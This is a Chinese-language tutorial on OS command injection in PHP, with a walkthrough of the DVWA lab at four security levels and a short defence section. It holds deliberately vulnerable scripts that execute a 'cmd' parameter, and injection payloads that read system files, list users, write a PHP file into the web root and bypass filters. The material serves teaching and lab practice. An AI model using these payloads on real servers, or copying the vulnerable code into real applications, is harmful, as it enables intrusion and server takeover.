【OS命令注入】常见OS命令执行函数以及OS命令注入利用实例以及靶场实验—基于DVWA靶场

目录

  • 1 OS命令注入概述
  • 2 常见OS命令注入函数及例子
    • 2.1 system()函数
    • 2.2 exec()函数
    • 2.3 shell_exec()函数
    • 2.4 passthru()函数
    • 2.5 popen()函数
    • 2.6 反引号结构
  • 3 OS命令注入漏洞的利用
    • 3.1 查看系统文件
    • 3.2 显示当前路径
    • 3.3 写文件
  • 4 OS命令注入漏洞的防御
  • 5 OS命令注入漏洞靶场实验
    • 5.1 实验目的
    • 5.2 实验环境
    • 5.3 实验前准备
    • 5.4 实验内容
      • 5.4.1 low级别
      • 5.4.2 medium级别
      • 5.4.3 high级别
      • 5.4.4 impossible级别
  • 6 总结

1 OS命令注入概述

背景:程序员使用脚本语言(如PHP等)开发应用程序过程中,脚本语言开发十分快速、简洁、方便,但是也伴随着一些问题,比如速度慢、无法触及系统底层等。开发的应用时,特殊是企业级的一些应用需要去调用一些外部程序(系统命令或者exe等可执行文件),当应用需要调用一些外部程序时就会用到一些系统命令的函数。

OS命令注入:当应用在调用这些系统命令函数时,如果将用户的输入作为系统命令的参数拼接到命令中,在没有过滤用户输入的情况下,就会造成命令执行漏洞。

条件

  • 程序中含有可以执行OS命令的函数或语言结构;
  • 传入该函数或语言结构的参数是客户端可以控制的(可以直接修改或造成影响)且没有进行足够的过滤。

漏洞危害

  • 继承Web服务器程序权限(Web用户权限)去执行系统命令;
  • 继承Web服务器程序权限(Web用户权限)去读写文件;
  • 反弹shell。通常我们对一个开启了80端口的服务器进行访问时,就会建立起与服务器Web服务链接,从而获取到服务器相应的Web服务。而反弹shell是我们开启一个端口进行监听,转而让服务器主动反弹一个shell来连接我们的主机,我们再通过接收到的shell进而来远程控制服务器。
  • 控制整个网站 ;
  • 控制整个服务器。

2 常见OS命令注入函数及例子

2.1 system()函数

作用:该函数能够将字符串作为OS命令执行,自带输出功能。

原型string system ( string $command [, int &$return_var ] )

危害:如果没有对该函数的参数进行有效准确过滤,其参数将有可能被用户用于注入有害代码。

例子

  • 在网站根目录下新建Command文件夹,并在该文件夹下新建txt文件,重命名为symtem.php,该文件的测试代码如下:
<?php
if(isset($_GET['cmd'])){
$cmd=$_GET['cmd'];
system($cmd);
}else{echo "Please submit cmd!<br >?cmd=ipconfig;";
}
?>
  • 在客户端我们访问该网页时带入如下参数以利用漏洞,网页将执行构造的语句返回系统信息(以下函数也是如此)。注入语句应与靶机系统相适应。
?cmd=ipconfig				//将返回IP配置信息
?cmd=cd						//查看当前目录
?cmd=systeminfo				//返回系统信息
?cmd=whoami					//
?cmd=net user				//查看或新增用户等
?cmd=dir					//将返回文件信息
?cmd=ping www.baidu.com		//执行ping命令,没结束前是不会返回结果。在Windows系统上默认ping 4次,但是在linux系统上将默认一直ping。
?cmd=type c:\windows\system32\drivers\etc\hosts	//查看系统文件
?cmd=echo"<?php phpinfo();?>">路径		//写入文件,可写入一句话木马等

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2.2 exec()函数

作用:该函数能够将字符串作为OS命令执行,需要配合输出结果命令

原型string exec ( string $command [, array &$output [, int &$return_var ]] )

危害:如果没有对该函数的参数进行有效准确过滤,其参数将有可能被用户用于注入有害代码。

例子

  • 在网站根目录下的Command文件夹下,新建txt文件,重命名为exec.php,该文件的测试代码如下:
<?php
if(isset($_GET['cmd'])){
$cmd=$_GET['cmd'];
print exec($cmd);
}else{echo "Please submit cmd!<br >?cmd=ipconfig;";
}
?>
  • 在客户端我们访问该网页时带入相关参数(与system()函数代入的参数一致)以利用漏洞。注意,该函数的返回结果是有限的。
    在这里插入图片描述

2.3 shell_exec()函数

作用:该函数能够将字符串作为OS命令执行,需要配合输出结果命令一般应用最广泛

危害:如果没有对该函数的参数进行有效准确过滤,其参数将有可能被用户用于注入有害代码。

例子

  • 在网站根目录下的Command文件夹下,新建txt文件,重命名为shell_exec.php,该文件的测试代码如下:
 <?php
if(isset($_GET['cmd'])){
$cmd=$_GET['cmd'];
print shell_exec($cmd);
}else{echo "Please submit cmd!<br >?cmd=ipconfig;";
}
?>
  • 在客户端我们访问该网页时带入相关参数(与system()函数代入的参数一致)以利用漏洞。
    在这里插入图片描述

2.4 passthru()函数

作用:该函数能够将字符串作为OS命令执行,自带输出功能。

原型void passthru ( string $command [, int &$return_var ] )

危害:如果没有对该函数的参数进行有效准确过滤,其参数将有可能被用户用于注入有害代码。

例子

  • 在网站根目录下的Command文件夹下,新建txt文件,重命名为passthru.php,该文件的测试代码如下:
<?php
if(isset($_GET['cmd'])){
$cmd=$_GET['cmd'];
passthru($cmd);
}else{echo "Please submit cmd!<br >?cmd=ipconfig;";
}
?>
  • 在客户端我们访问该网页时带入相关参数(与system()函数代入的参数一致)以利用漏洞。
    在这里插入图片描述

2.5 popen()函数

作用:该函数能执行OS命令,返回的是一个文件指针。无论返回什么,我们关心的是命令被执行了。

特点:与其他函数不同的是,需要传入第二个参数作为第一个参数执行结果的存储文件。

例子

  • 在网站根目录下的Command文件夹下,新建txt文件,重命名为popen.php,该文件的测试代码如下:
<meta charset='gb2312'>
<?php
if (isset($_GET['cmd'])){echo"<pre>";popen($_GET['cmd'],'r');
}else{echo"?cmd=whoami";
}
?>
  • 在客户端我们访问该网页时带入如下参数,网页将执行构造的语句并在同目录下生成文件(如已有该文件则追加内容)。
?cmd=ipconfig >>1.txt				//将返回IP配置信息
?cmd=systeminfo >>1.txt				//返回系统信息
?cmd=whoami >>1.txt					//
?cmd=net user >>1.txt				//查看或新增用户等
?cmd=dir >>1.txt					//将返回文件信息
?cmd=ping www.baidu.com >>1.txt		//执行ping命令,没结束前是不会返回结果。在Windows系统上默认ping 4次,但是在linux系统上将默认一直ping。

在这里插入图片描述

  • 访问刚刚写入的1.txt文件,内容如下,说明上述命令执行成功。

在这里插入图片描述

2.6 反引号结构

作用反引号内[ ]的字符串也会被解析成OS命令执行,需要配合输出结果命令

注意

  • 反引号运算符在激活了安全模式或者关闭了 shell_exec() 时是无效的。
  • 与其它某些语言不同,反引号不能在双引号字符串中使用。

例子

  • 在网站根目录下的Command文件夹下,新建txt文件,重命名为`.php,该文件的测试代码如下:
<?php
if(isset($_GET['cmd'])){
$cmd=$_GET['cmd'];
print `($cmd)`;
}else{echo "Please submit cmd!<br >?cmd=ipconfig;";
}
?>
  • 在客户端我们访问该网页时带入相关参数(与system()函数代入的参数一致)以利用漏洞。
    在这里插入图片描述

3 OS命令注入漏洞的利用

OS 命令注入漏洞,攻击者直接继承Web用户权限,在服务器上执行任意命令,危害特别大。以下命令均在windows 系统下测试成功。

3.1 查看系统文件

采用真实机访问system.php,其中提交参数?cmd=type c:\windows\system32\drivers\etc\hosts,查看系统hosts 文件。
在这里插入图片描述

3.2 显示当前路径

采用真实机访问system.php,其中提交参数?cmd=cd
在这里插入图片描述

3.3 写文件

(1)采用真实机访问system.php,其中提交参数?cmd=echo "<?php phpinfo();?>" > C:\phpStudy\PHPTutorial\WWW\Command\shell.php
在这里插入图片描述

(2)页面没有报错,访问shell.php 文件,验证文件是否写入成功
在这里插入图片描述

4 OS命令注入漏洞的防御

(1)尽量减少命令执行函数的使用,并在disable_functions中禁用(php.ini配置文件中的disable_functions设置);
(2)在进入命令执行函数或方法前,应对参数进行过滤;
(3)参数的值尽量使用引号进行包裹,并在拼接调用前调用addslashes进行转义。
在这里插入图片描述

5 OS命令注入漏洞靶场实验

5.1 实验目的

(1)结合SQL注入、XSS漏洞、PHP语句注入等实验,加深理解注入语句的构造与绕过思路;
(2)掌握OS命令注入漏洞的检验与利用方法;
(3)加强代码审计能力。

5.2 实验环境

靶机:win2008虚拟机,部署WAMP环境,并搭建DVWA靶场。虚拟机系统安装及WAMP部署方法参考文章《【语言环境】WAMP环境部署及优化—以win2008R2SP1为操作系统》,DVWA靶场的搭建参考《【环境搭建-02】基于WAMP环境的DVWA漏洞靶场的搭建》

真实机:win10系统。

5.3 实验前准备

Windows 系例支持的多语句执行如下:

  • |:直接执行后面的语句。例如: ping 127.0.0.1|whoami。
  • ||:或,如果前面命令成功执行,那么命令结束执行;当前面的语句执行出错时,执行后面的语句。例如: ping 127.0.0.1||whoami。
  • &:如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。例如: ping 127.0.0.1&whoami。
  • &&:与,如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句只能为真。例如: ping 127.0.0.1&&whoami。

Linux系统支持的多语句执行如下:

  • ;:执行完前面的语句再执行后面的。例如: ping 127.0.0.1;whoami。
  • |:显示后面语句的执行结果。例如: ping 127.0.0.1|whoami。
  • ||:或,如果前面命令成功执行,那么命令结束执行;当前面的语句执行出错时,执行后面的语句。例如: ping 127.0.0.1||whoami。
  • &:如果前面的语句为假则直接执行后面的语句,前面的语句可真可假 。例如: ping 127.0.0.1&whoami。
  • &&:如果前面的语句为假则直接出错,也不执行后面的,前面的语句只能为真。例如: ping 127.0.0.1&&whoami。

5.4 实验内容

尝试对不同安全级别的OS命令注入漏洞进行渗透,同时结合其代码审计互相印证学习。

5.4.1 low级别

(1)打开DVWA靶场(登录账号默认是admin,密码是password。),并将难度级别设置为low
在这里插入图片描述

(2)当输入IP地址为127.0.0.1并点击submit时,回显内容为ping的结果。对此,我们推断该处输入参数能带入到后台执行,并回显内容,可能存在注入点。在我们参数输入位置前,应该是有ping命令。
在这里插入图片描述

(3)我们采用语句whoami对网站及后台进行无损检测,更换为其他命令可实施攻击。修改参数为127.0.0.1&&whoami(127.0.0.1是为了使前面的ping闭合,&&为与),回显结果如下,可以看到成功注入出系统信息。
在这里插入图片描述
(4)这是几个注入语句的测试结果对比,可以注入语句可能还有更多:

127.0.0.1&&whoami			//成功执行并返回ping的信息和whoami的信息
127.0.0.1&whoami			//成功执行并返回ping的信息和whoami的信息
127.0.0.1;whoami			//执行失败,从cmd运行结果看似乎分号不能分隔开两个语句
127.0.0.1|whoami			//成功执行,仅返回whoami信息。
127.0.0.1| whoami			//成功执行,仅返回whoami信息。
127.0.0.0.1||whoami			//故意输入一个错误的IP,让程序执行或运算符后面的语句。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

(5)代码审计,可以看到该网页采用了shell_exec函数,同时,参数没有任何过滤。
在这里插入图片描述

<?php
if( isset( $_POST[ 'Submit' ]  ) ) {// Get input$target = $_REQUEST[ 'ip' ];// Determine OS and execute the ping command.if( stristr( php_uname( 's' ), 'Windows NT' ) ) {// Windows$cmd = shell_exec( 'ping  ' . $target );}else {// *nix$cmd = shell_exec( 'ping  -c 4 ' . $target );}// Feedback for the end userecho "<pre>{$cmd}</pre>";
}
?>

5.4.2 medium级别

(1)将DVWA靶场的难度级别设置为medium
(2)在low级别的基础上,测试其可行注入语句在medium级别的运行情况。

127.0.0.1&&whoami			//执行失败,从显示错误信息判断可能是&&被过滤
127.0.0.1&whoami			//成功执行并返回ping的信息和whoami的信息
127.0.0.1|whoami			//成功执行,仅返回whoami信息。
127.0.0.1| whoami			//成功执行,仅返回whoami信息。
127.0.0.0.1||whoami			//故意输入一个错误的IP,让程序执行或运算符后面的语句。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

(3)代码审计,从其代码分析,在参数输入后对&&和;都过滤掉了。
在这里插入图片描述

<?php
if( isset( $_POST[ 'Submit' ]  ) ) {// Get input$target = $_REQUEST[ 'ip' ];// Set blacklist$substitutions = array('&&' => '',';'  => '',);// Remove any of the charactars in the array (blacklist).$target = str_replace( array_keys( $substitutions ), $substitutions, $target );// Determine OS and execute the ping command.if( stristr( php_uname( 's' ), 'Windows NT' ) ) {// Windows$cmd = shell_exec( 'ping  ' . $target );}else {// *nix$cmd = shell_exec( 'ping  -c 4 ' . $target );}// Feedback for the end userecho "<pre>{$cmd}</pre>";
}
?>

5.4.3 high级别

(1)将DVWA靶场的难度级别设置为high

(2)在low级别的基础上,测试其可行注入语句在medium级别的运行情况。

127.0.0.1&&whoami			//执行失败,从显示错误信息判断可能是&&被过滤
127.0.0.1&whoami			//执行失败,从显示错误信息判断可能是&被过滤
127.0.0.1|whoami			//成功执行,仅返回whoami信息。
127.0.0.1| whoami			//执行失败,从显示错误信息判断可能是| 被过滤
127.0.0.0.1||whoami			//执行失败,从显示错误信息判断可能是||被过滤

(3)代码审计,从其代码分析,在参数输入后对多种符号都过滤掉了。
在这里插入图片描述

<?php
if( isset( $_POST[ 'Submit' ]  ) ) {// Get input$target = trim($_REQUEST[ 'ip' ]);// Set blacklist$substitutions = array('&'  => '',';'  => '','| ' => '','-'  => '','$'  => '','('  => '',')'  => '','`'  => '','||' => '',);// Remove any of the charactars in the array (blacklist).$target = str_replace( array_keys( $substitutions ), $substitutions, $target );// Determine OS and execute the ping command.if( stristr( php_uname( 's' ), 'Windows NT' ) ) {// Windows$cmd = shell_exec( 'ping  ' . $target );}else {// *nix$cmd = shell_exec( 'ping  -c 4 ' . $target );}// Feedback for the end userecho "<pre>{$cmd}</pre>";
}
?>

5.4.4 impossible级别

(1)将DVWA靶场的难度级别设置为impossible
(2)代码审计,该级别的代码过滤原则采用的是“满足才给过”,而不是前两关的“满足黑名单就过滤”的原则,因此无法注入其他命令骗其执行。但是该代码的书写方式也限制了用户的输入,比如ping域名则无法ping通
在这里插入图片描述

<?php
if( isset( $_POST[ 'Submit' ]  ) ) {// Check Anti-CSRF tokencheckToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );// Get input$target = $_REQUEST[ 'ip' ];$target = stripslashes( $target );// Split the IP into 4 octects$octet = explode( ".", $target );// Check IF each octet is an integerif( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {// If all 4 octets are int's put the IP back together.$target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];// Determine OS and execute the ping command.if( stristr( php_uname( 's' ), 'Windows NT' ) ) {// Windows$cmd = shell_exec( 'ping  ' . $target );}else {// *nix$cmd = shell_exec( 'ping  -c 4 ' . $target );}// Feedback for the end userecho "<pre>{$cmd}</pre>";}else {// Ops. Let the user name theres a mistakeecho '<pre>ERROR: You have entered an invalid IP.</pre>';}
}
// Generate Anti-CSRF token
generateSessionToken();
?>

6 总结

(1)了解可能引起OS命令注入的函数;
(2)掌握这些函数的使用方法;
(3)了解常用的防御方法。
(4)了解OS命令注入的绕过思路。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/38157.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Linux —— tftp 使用

提示&#xff1a;tftp 命令在 uBoot 系统和 Linux 系统下的使用是不一样的 前言 在 Linux 移植过程或裸机开发中&#xff0c;经常要使用到 tftp 命令&#xff0c;本文围绕该命令相关的网络配置及使用做出记录&#xff0c;本文中&#xff0c;开发电脑命名为上位机&#xff0c;新…

linux 之TFTP的使用

简介 TFTP是用来下载远程文件的最简单网络协议&#xff0c;它其于UDP协议而实现。嵌入式linux的tftp开发环境包括两个方面&#xff1a;一是linux服务器端的tftp-server支持&#xff0c;二是嵌入式目标系统的tftp-client支持。因为u-boot本身内置支持tftp-client&#xff0c;所以…

嵌入式linux与windows之间的tftp文件传输(保姆级)

目录 前言一、为什么要文件传输二、利用共享文件夹(简要流程)三、tftp传输与环境搭建四、传输前的准备工作五、测试准备工作是否完成六、传输文件6.1、windows中tftp32的配置6.2、嵌入式Linux(板子)中获取或发送文件6.2.1、tftp命令用法 前言 在我们接触嵌入式Linux之前&#…

用于医疗领域的聊天机器人ChatDoctor

ChatGPT系列文章 文章目录 ChatGPT系列文章ChatDoctor数据集模型训练参考资料 ChatDoctor ChatDoctor: A Medical Chat Model Fine-tuned on LLaMA Model using Medical Domain Knowledge 论文地址&#xff1a;https://arxiv.org/pdf/2303.14070.pdf 在通用领域中的大型语言…

2021年中国互联网行业投融资运行现状及未来发展趋势分析[图]

互联网指的是网络与网络之间所串连成的庞大网络&#xff0c;这些网络以一组通用的协议相连&#xff0c;形成逻辑上的单一巨大国际网络。 一、全球互联网行业投融资运行现状 国际环境更趋复杂严峻&#xff0c;世界经济复苏放缓&#xff0c;通胀压力上升与疫情蔓延交织。2021年…

2021年中国企业风险投资发展现状及未来发展趋势分析[图]

企业风险投资是指有明确主营业务的非金融企业在其内部和外部所进行的风险投资活动。企业从事风险投资的形式主要有两种&#xff1a;一种是把用于风险投资的资金委托给专业的风险投资公司进行管理&#xff0c;由其成立的投资基金根据委托方的战略需要选择投资目标&#xff1b;另…

最强对话模型 ChatGPT 向 Google 搜索发起挑战

GPT-3 发布的两年后&#xff0c;我们没等来它的亲弟弟 GPT-4&#xff0c;而是在今天亲眼见证了 OpenAI 带来了一种全新的 AI 聊天机器人——ChatGPT&#xff0c;也可以称之为是 GPT-3 家族里面的亲戚&#xff0c;它不仅可以解释代码、编写情景喜剧脚本&#xff0c;也可以为用户…

Google 新一代音乐识别

文 / Google AI 苏黎世办公室 James Lyon 2017 年&#xff0c;我们发布了具有闻曲知音功能的 Pixel 2&#xff0c;就是利用深度神经网络为移动设备带来低功耗、始终开启的音乐识别功能。在开发 “闻曲知音” 时&#xff0c;我们的目标是打造一个小巧高效的音乐识别器&#xff0…

谷歌AudioLM :通过歌曲片段生成后续的音乐

AudioLM 是 Google 的新模型&#xff0c;能够生成与提示风格相同的音乐。该模型还能够生成复杂的声音&#xff0c;例如钢琴音乐或人的对话。结果是它似乎与原版没有区别&#xff0c;这是十分让人惊讶的。 为什么生成音乐如此困难? 创作音乐并不是一件容易的事。生成音频信号&…

“程序员交友网站” SO 突然裁员 10%,网友:ChatGPT 出来后就不咋用了

在ChatGPT影响下&#xff0c;知名开发者问答社区Stack Overflow撑不住要裁员了&#xff01; 随着用户大规模转战ChatGPT&#xff0c;Stack Overflow访问量大幅骤降&#xff0c;且盈利情况不容乐观。 CEO Prashanth Chandrasekar在公开信中坦言&#xff1a;正处于困难时期。 具…

巴比特 | 元宇宙每日必读:浙江发布2023年元宇宙产业发展工作要点,6月底前组建元宇宙产业联盟,年底打造20家“专精特新”企业...

摘要&#xff1a;据浙江省发改委官网 4 月 24 日消息&#xff0c;浙江省发改委等 5 部门近日联合印发《浙江省元宇宙产业发展 2023 年工作要点》。《工作要点》制定了十六项主要任务&#xff0c;并提出在2023 年 4 月底前建立元宇宙部门工作协同机制&#xff1b;6 月底前组建元…

免费版GPT-4!美国AI初创公司推出Forefront Chat,火到官网崩溃

免费版 GPT-4 到底香不香&#xff1f; AI初创企业正式推出Forefront Chat 近日&#xff0c;Forefront AI 正式推出 Forefront Chat&#xff0c;允许用户免费体验 GPT-4 的强大功能。ForeFront AI 是一家总部位于纽约的软件开发公司&#xff0c;联合创始人分别为 Jimmy Grease…

VTK笔记-生成MIP图像-vtkImageSlabReslice类

MIP MIP&#xff08;Maximum/Minimum Intensity Projection&#xff09;&#xff0c;最大/最小密度投影重建。   MIP可以较真实地反应组织密度差异&#xff0c;使得血管的异常改变、形态、走形强化&#xff1b;但是只适用于外观形态的显示。   在容积扫描数据中对每条径线上…

重温马云英文演讲:最伟大的成功

“机会在哪呢&#xff1f;”每当创业者发出这个疑问&#xff0c;我们就该重温马云的这段英文演讲&#xff0c;让奋斗的热血重新沸腾起来。你有什么。你有年轻的身体&#xff0c;你有奇妙的想法&#xff0c;你有乐观的心态&#xff0c;你有无限的可能性&#xff01; 演讲全文&am…

马云退隐前,在年会上说了最重要的三件事

作者&#xff1a;黄小斜 今天是9月10号教师节&#xff0c;也是马老师卸任阿里巴巴董事长的日子&#xff0c;同时也是阿里巴巴召开20周年年会的日子。有幸抽中了门票&#xff0c;在现场见证这具有历史意义的一幕&#xff0c;马老师在中场时给我们带来了一段演讲&#xff0c;也是…

阿里巴巴CTO独家自述:CTO就是要给CEO扫清障碍和风险

CTO可能不是思想家&#xff0c;但一定是行动派。 本文来自《云栖战略参考》第二期&#xff0c;过程中鲁肃非常坦率地探讨了一位合格CTO应该具备的素质&#xff0c;以及他自己一路摔打成长的心路历程。 一 我的经历 我的经历很简单&#xff0c;2004年之前一直在学校读书&#x…

马云现身西班牙度假 半年多来首次在境外露面

这半年里&#xff0c;马云公开露面的次数不到三次&#xff0c;就连前段时间的世界互联网大会也不见他的身影。 极少数出现在公众视野的马老师似乎在努力低调&#xff0c;但是他的一举一动仍然受人关注。 西班牙多家媒体10月19日报道&#xff0c;马云上周六飞抵西班牙, 在伊维…

【历史上的今天】8 月 22 日:改变世界的程序员们;网络直播的鼻祖;何小鹏离开阿里巴巴

整理 | 王启隆 透过「历史上的今天」&#xff0c;从过去看未来&#xff0c;从现在亦可以改变未来。 今天 2022 年 8 月 22 日。历史上的今天&#xff0c;Masatoshi Shima 出生&#xff0c;他和 英特尔&#xff08;Intel&#xff09; 合作设计的芯片让第一个微处理器 Intel 400…

马来西亚热情拥抱阿里巴巴 马云倡议的eWTP首次落地海外

摘要&#xff1a;3月22日&#xff0c;马来西亚总理纳吉布与阿里巴巴集团董事局主席马云一同出现在吉隆坡一场盛大启动仪式上&#xff0c;他们将共同见证马云的eWTP理念落地马来西亚。 3月22日&#xff0c;在邀请阿里巴巴集团董事局主席马云、阿里巴巴集团CEO张勇、蚂蚁金服集团…

基于GPT4All的大型语言模型设计生态系统

GPT4All 一套专为强大、定制的大型语言模型设计的生态系统,能够在消费级CPU上本地运行。在GPT4All中,所使用的模型是一个3GB至8GB的文件,读者可以自行下载该文件,并将其插入到GPT4All的开源生态系统软件中。这一软件生态系统由Nomic AI提供支持并进行维护,其目的是确保系统…